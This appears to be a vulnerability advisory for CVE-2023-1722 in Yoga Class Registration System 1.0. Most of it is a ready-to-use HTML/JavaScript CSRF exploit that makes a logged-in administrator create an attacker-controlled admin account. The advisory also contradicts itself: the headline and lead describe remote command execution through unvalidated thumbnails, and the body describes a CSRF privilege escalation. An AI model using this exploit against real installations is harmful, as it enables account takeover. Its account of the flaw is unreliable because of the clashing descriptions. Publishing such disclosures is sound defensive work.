Headline

CVE-2023-1722: Yoga Class Registration System 1.0 - ATO | Advisories | Fluid Attacks

Yoga Class Registration System version 1.0 allows an administrator to execute commands on the server. This is possible because the application does not correctly validate the thumbnails of the classes uploaded by the administrators.

1 year ago

CVE

Open in Source

#sql #csrf #vulnerability #linux #php #rce

Wyckoff

Summary

Name

Yoga Class Registration System 1.0 - RCE

Code name

Wyckoff

Product

Yoga Class Registration System

Affected versions

Version 1.0

State

Public

Release date

2023-06-23

Vulnerability

Kind

Cross-site request forgery

Rule

007. Cross-site request forgery

Remote

Yes

CVSSv3 Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

CVSSv3 Base Score

6.5

Exploit available

Yes

CVE ID(s)

CVE-2023-1722

Description

Yoga Class Registration System Version 1.0 allows an external attacker to elevate privileges in the application. This is possible because the application is not protected against CSRF attacks.

Vulnerability

The application is not protected against CSRF attacks, so an attacker can persuade an administrator to create a new account with administrative permissions, along with the credentials set by the attacker.

Exploitation

To exploit the vulnerability I have written the following exploit:

<!DOCTYPE html>
<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/retr02332.com\/php-ycrs\/classes\/Users.php?f=save", true);
        xhr.setRequestHeader("Accept", "*\/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------426135374114296864734166274622");
        xhr.withCredentials = true;
        var body = "-----------------------------426135374114296864734166274622\r\n" +
          "Content-Disposition: form-data; name=\"id\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------426135374114296864734166274622\r\n" +
          "Content-Disposition: form-data; name=\"firstname\"\r\n" +
          "\r\n" +
          "test\r\n" +
          "-----------------------------426135374114296864734166274622\r\n" +
          "Content-Disposition: form-data; name=\"middlename\"\r\n" +
          "\r\n" +
          "test\r\n" +
          "-----------------------------426135374114296864734166274622\r\n" +
          "Content-Disposition: form-data; name=\"lastname\"\r\n" +
          "\r\n" +
          "test\r\n" +
          "-----------------------------426135374114296864734166274622\r\n" +
          "Content-Disposition: form-data; name=\"username\"\r\n" +
          "\r\n" +
          "test\r\n" +
          "-----------------------------426135374114296864734166274622\r\n" +
          "Content-Disposition: form-data; name=\"password\"\r\n" +
          "\r\n" +
          "test\r\n" +
          "-----------------------------426135374114296864734166274622\r\n" +
          "Content-Disposition: form-data; name=\"type\"\r\n" +
          "\r\n" +
          "1\r\n" +
          "-----------------------------426135374114296864734166274622\r\n" +
          "Content-Disposition: form-data; name=\"img\"; filename=\"\"\r\n" +
          "Content-Type: application/octet-stream\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------426135374114296864734166274622--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

Evidence of exploitation

Our security policy

We have reserved the CVE-2023-1722 to refer to these issues from now on.